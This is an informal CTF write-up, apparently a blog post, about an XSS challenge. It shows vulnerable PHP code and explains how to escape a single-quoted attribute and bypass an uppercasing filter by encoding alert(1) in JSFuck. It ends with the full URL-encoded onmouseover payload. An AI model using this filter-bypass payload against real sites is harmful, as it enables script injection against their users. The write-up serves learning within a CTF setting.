Greetings fellas I was doing a ctf challenge on https://www.contextis.com/careers/challenges/web-application it was about xss so here is the code u need to break
<?php
$NAME=$_GET[‘name’];
$NAMESAN=strtoupper(htmlspecialchars($NAME));
echo “<HTML><body>”;
echo ‘<form action=””>’;
echo “First name: <input type=’text’ name=’name’ value='”.$NAMESAN.”‘><br>”;
echo “<input type=’submit’ value=’Submit form’></form>”;
echo “</HTML></body>”;
?>
u cant use ‘<’ and ‘>’ due to this function htmlspecialchars() so I will go with the javascript’s event kind of attack you know onclick,mouseover kinda vector .
First I m going to use a ‘ to get out of value attribute and see the affect
‘ onclick=alert(1); I tried but the crap function strtoupper capitalized my input and made it unusable .
Basically whatever alphabet I typed it was going to change it into upper letters.
After bashing my head on different website pages I found something incredible built and awesome .the thing is jsfuck yeah!!!!!
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
Are u kidding only 6 character to write javascript grossssss
so in jsfuck that is how alert(1); looks
gezz christ !!!!!! Time to see the magic
remember replace + with its urlencoding equivalent %2b so the final attacking vector is
‘ onmouseover='[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]][([][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b([][[]]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b([][[]]%2b[])[%2b[]]%2b([][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[%2b!%2b[]%2b[%2b[]]]%2b(!![]%2b[])[%2b!%2b[]]]((![]%2b[])[%2b!%2b[]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]]%2b[%2b!%2b[]]%2b(!![]%2b[][(![]%2b[])[%2b[]]%2b([![]]%2b[][[]])[%2b!%2b[]%2b[%2b[]]]%2b(![]%2b[])[!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b[]]%2b(!![]%2b[])[!%2b[]%2b!%2b[]%2b!%2b[]]%2b(!![]%2b[])[%2b!%2b[]]])[!%2b[]%2b!%2b[]%2b[%2b[]]])()
